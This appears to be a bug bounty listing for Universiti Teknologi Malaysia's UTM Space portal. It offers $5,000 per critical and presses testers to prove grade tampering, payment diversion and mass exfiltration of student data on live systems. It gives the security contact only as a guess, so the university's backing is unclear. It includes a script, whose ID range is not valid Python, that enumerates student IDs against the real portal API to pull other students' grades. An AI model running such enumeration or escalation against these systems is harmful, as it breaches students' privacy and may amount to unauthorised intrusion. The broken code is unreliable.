Academic surface worth stress-testing
UTM Space serves as the central digital hub for Universiti Teknologi Malaysia, one of the country’s leading research-intensive universities serving tens of thousands of students and staff across multiple campuses in Johor and Kuala Lumpur. The platform concentrates sensitive student data, financial transactions, academic records, identity federation, course management, research grant administration, library access, and administrative workflows — fertile ground for unauthorized grade manipulation, mass PII exfiltration, payment diversion, and cross-department data bleed if tenant isolation fails. This playbook rewards only highest-impact, fully demonstrated criticals — each earns $5,000.
In scope materially: every HTTP host on utm.my operated by UTM, API endpoints, SSO integration (including SAML/OAuth flows), payment gateway connectors, database rows served by UTM infra, student and staff portal renderers, static deploy paths, session signing secrets in their custody, library system integrations, exam scheduling modules, hostel booking flows, research repository systems, mobile-responsive endpoints, IoT/smart-campus surfaces they expose, CDN cache poisoning surfaces where they originate HTML/JS bundles, and administrative dashboards.
Civil exclusions only: blackmail, mass student harassment, brute forcing wholly unrelated external bank accounts. Those bans are universal — not SKU-level scope fences.
1️⃣ Narrative kill chain tying root cause → exploit steps → observable impact 2️⃣ Proof the attack succeeds (replayable scripts, fixture logs, video with signatures, scripted harness). Narratives without a working exploitation path are graded below payout threshold.
Why probe UTM Space?
Flat $5K critical payouts
No spreadsheet bingo — validated critical exploits with reproducible payloads earn exactly $5,000 USD.
Student data + payment blast radius
Transcripts, fees, enrollment, hostel bookings, library records, research grants — chained bugs often expose PII silently until someone maps them.
No fake micro-scope list
If UTM can patch/configure it — from portal JS to infra config — testers can escalate until severity lands or triage shuts with reasoning.
Responsible disclosure halo
Demonstrated exploits with airtight chains earn coordinated publication credit after fixes ship.
$5,000 per validated critical
There is exactly one bounty amount on this ledger: validated critical findings pay $5,000 USD each. Novel low-severity items may qualify for goodwill credit but not this stipend. Paid rows require attacker-readable kill chains and replayable exploitation artefacts (Burp exports, parallel request harnesses, SSO token forgeries, signing traces…).
Unauthorized access to or modification of student/staff records at scale; SSO bypass granting admin-level access across UTM’s portfolio; payment gateway manipulation causing silent fee reroute; mass PII exfiltration of academic or personal data; persisted RCE in portal or LMS control plane; break-glass access to signing keys or database credentials.
- Cross-user grade/transcript manipulation, enrollment logic desync, or duplicate credit
- Payment callback abuse causing silent fee reroute or duplicate credit at scale
- Break-glass SSRF egress from UTM infra to lateral cloud or on-premise systems
Illustrative map (non-exhaustive)
These rows do not impose limits — they’re shorthand for tagging reports. Anything UTM hosts, signs, proxies, parses, verifies, or integrates counts as bounty ground even if undocumented here. Treat “not listed” ≠ “out-of-scope”: default stance is open scope across UTM’s digital perimeter.
| Surface | Class | Critical payout |
|---|---|---|
space.utm.my, portal HTML/JS/CSS, mobile endpoints, *.utm.my |
Web · CDN | $5,000 / validated bug |
| Student APIs, LMS integrations (e.g. e-learning), SSO endpoints (SAML, OAuth, session cookies) | Backend | $5,000 / validated bug |
| Fee payment gateway, checkout redirects, receipt generation, financial aid systems | Payments | $5,000 / validated bug |
| Admin dashboards, exam scheduling, hostel booking, research repositories | Admin | $5,000 / validated bug |
| IoT / smart-campus surfaces, library systems, staff portals | Infra | $5,000 / validated bug |
Everything UTM operates — no exclusions list
Sandbox student portals, canary databases, Grafana for campus systems, Telegram/bot hooks for admin alerts, partner LMS or library integrations fronted by UTM — all eligible when critical impact reproduces.
- Vanity subdomains CNAME’d into UTM edge — show DNS/traffic proof in your write-up.
- Mobile app SDKs or widgets UTM ships to students/staff
- Research grant management systems operated under utm.my
- IoT or smart-campus callbacks verified with UTM-issued secrets
Rules of engagement
- Prove exploitation success. Provide scripts, HARs, parallel request captures, or signing traces showing data/state impact — not paper analysis alone.
- Number your hops. Session/API primitive → escalation → grade/payment/record integrity break.
- Minimize real-user blast radius. Prefer mirrors, low-value accounts, and reversible payloads when demonstrating theft-class bugs.
- Private coordination first. Use official intake on space.utm.my before public threads.
- Duplicate fairness. First qualifying PoC wins; followers close acknowledged-only.
How to submit a report
Use the security / vulnerability disclosure contact published on https://space.utm.my/ (security@utm.my is a common guess — verify on the live site before emailing). Template below.
# Title
[Critical][Exploit-Proven] <tight title>
# Executive summary — student/staff or financial impact in one paragraph
# Severity self-classification → must map to UTM Space critical definitions above
## Attack chain narrative (numbered, no gaps)
1. Preconditions (session, API key tier, endpoint, account ID)
2. Entry primitive — HTTP/WS line + signature headers
3. Pivot(s) → privilege/data/payment escalation
4. Final hop → PII exfil / grade manipulation / payment diversion / infra takeover equivalent
## Successful exploitation evidence
• Scripted replay showing record/payment impact
• Paired HAR/PCAP demonstrating cross-user data access
• Signing or token trace if SSO/crypto primitive involved
# Remediation suggestion (optional but appreciated)
• Short description of expected fix orientation
# Attachments (zipped, <10 MB, no malware)
- PoC script.py, capture.har, logs/Python vignette · pair with reproducible HTTPS exploit replay
Pseudocode illustrating an IDOR transcript access — meaningless without attaching HAR/logs proving an unauthorized request retrieves another student’s academic record inside UTM Space.
# BUGGY: verifies only session presence, skips transcript ownership bind
import requests
BASE = "https://space.utm.my/api/v1"
SESSION = "eyJhbGciOiJIUzI1NiIs..." # valid student session
def fetch_transcript(student_id):
resp = requests.get(
f"{BASE}/transcripts/{student_id}",
headers={"Cookie": f"utm_session={SESSION}"}
)
return resp.json()
# MISSING: server-side check that session.student_id == requested student_id
# attacker iterates student_id → exfiltrates arbitrary academic records
for i in range(A23CS0001, A23CS5000):
data = fetch_transcript(i)
if "cgpa" in data:
print(i, data["cgpa"])Frequently asked questions
Is anything actually “out of scope” besides illegal stuff?
No discretionary product carve-outs — only universal legal/ethical lines (crime, harming unrelated civilians, ransomware, facilitating academic dishonesty, etc.). If UTM hosts, proxies, signs, or documents a surface technically, testers can escalate until triage disqualifies specifics.
Do speculative write-ups without a working exploit get paid?
No. $5K critical payouts require both a complete kill-chain narrative and evidence of a successful attack path (replayable artifacts). Theory-only stays in triage backlog without compensation.
Are staging / dev environments fair game?
Yes whenever UTM labels or operates them.
Demonstrate realism by mirroring configs/data where possible.
Duplicates?
Fastest validated chain + reproducible exploitation wins treasury; follower tickets close acknowledged only.
Lower severities rewarded?
Not under this $5K-flat critical playbook — escalate impact until it meets critical thresholds or accept non-monetary acknowledgement.
Critical chain + working exploit = $5,000
No narrow scope appendix — document the attack, prove it lands, file privately.